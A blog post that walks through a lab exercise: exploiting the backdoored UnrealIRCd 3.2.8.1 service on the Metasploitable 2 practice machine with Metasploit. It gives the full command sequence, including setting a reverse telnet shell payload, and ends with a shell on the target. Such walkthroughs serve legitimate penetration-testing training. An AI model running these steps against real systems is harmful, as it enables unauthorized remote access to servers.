Comments

Pages

Wednesday 17 October 2012

Metasploitable 2 has been pWned - Part 2

Posted by at 01:00 Read our previous post
After posting about pentest on Metasploitable v.2 (here),  I will continue to attack again on machine target using result from Nmap scanning before. You can see the available service here.
Ok, in this post the target service is Unreal IRCd.


  1. Run the Metasploit
  2. Search exploit for Unreal IRCd using metasploit
    # msf > search unreal irc
  3. It will returned :
    exploit/unix/irc/unreal_ircd_3281_backdoor  2010-06-12 00:00:00 UTC  excellent  UnrealIRCD 3.2.8.1 Backdoor Command Execution
  4. Now, use the exploit above
    # msf > use exploit/unix/irc/unreal_ircd_3281_backdoor
  5. See what the available configuration for this exploit
    # msf  exploit(unreal_ircd_3281_backdoor) > show options
    It will returned,
    Module options (exploit/unix/irc/unreal_ircd_3281_backdoor):
    
    Name   Current Setting  Required  Description
    ----   ---------------  --------  -----------
    RHOST                   yes       The target address
    RPORT  6667             yes       The target port
    
    
    Exploit target:
    
    Id  Name
    --  ----
    0   Automatic Target
  6. Set the RHOST,
    # msf  exploit(unreal_ircd_3281_backdoor) > set RHOST 192.168.56.103
  7. Show the available payloads,
    # msf  exploit(unreal_ircd_3281_backdoor) > show payloads
    returned:
    ompatible Payloads
    ===================
    
       Name                     Disclosure Date  Rank    Description
       ----                     ---------------  ----    -----------
       cmd/unix/bind_perl                        normal  Unix Command Shell, Bind TCP (via Perl)
       cmd/unix/bind_perl_ipv6                   normal  Unix Command Shell, Bind TCP (via perl) IPv6
       cmd/unix/bind_ruby                        normal  Unix Command Shell, Bind TCP (via Ruby)
       cmd/unix/bind_ruby_ipv6                   normal  Unix Command Shell, Bind TCP (via Ruby) IPv6
       cmd/unix/generic                          normal  Unix Command, Generic Command Execution
       cmd/unix/reverse                          normal  Unix Command Shell, Double reverse TCP (telnet)
       cmd/unix/reverse_perl                     normal  Unix Command Shell, Reverse TCP (via Perl)
       cmd/unix/reverse_ruby                     normal  Unix Command Shell, Reverse TCP (via Ruby)
  8. I will use cmd/unix/reverse for telnet connection,
    # msf  exploit(unreal_ircd_3281_backdoor) > set PAYLOAD cmd/unix/reverse
  9. See the configuration for the payload,
    # msf  exploit(unreal_ircd_3281_backdoor) > show payloads
    returned,
    Module options (exploit/unix/irc/unreal_ircd_3281_backdoor):
    
       Name   Current Setting  Required  Description
       ----   ---------------  --------  -----------
       RHOST  192.168.56.103   yes       The target address
       RPORT  6667             yes       The target port
    
    
    Payload options (cmd/unix/reverse):
    
       Name   Current Setting  Required  Description
       ----   ---------------  --------  -----------
       LHOST                   yes       The listen address
       LPORT  4444             yes       The listen port
    
    
    Exploit target:
    
       Id  Name
       --  ----
       0   Automatic Target
    
  10. Set the LHOST with our IP Address
    # msf  exploit(unreal_ircd_3281_backdoor) > set LHOST 192.168.56.101
  11. Now, launch the exploit
    # msf  exploit(unreal_ircd_3281_backdoor) > exploit
  12. OK, wait for a minute and you will bringing into linux shell... type uname -a for test
    # uname -a

No comments:

Post a Comment

©2012 SECURITY is powered by Blogger - Template designed by Stramaxon - Best SEO Template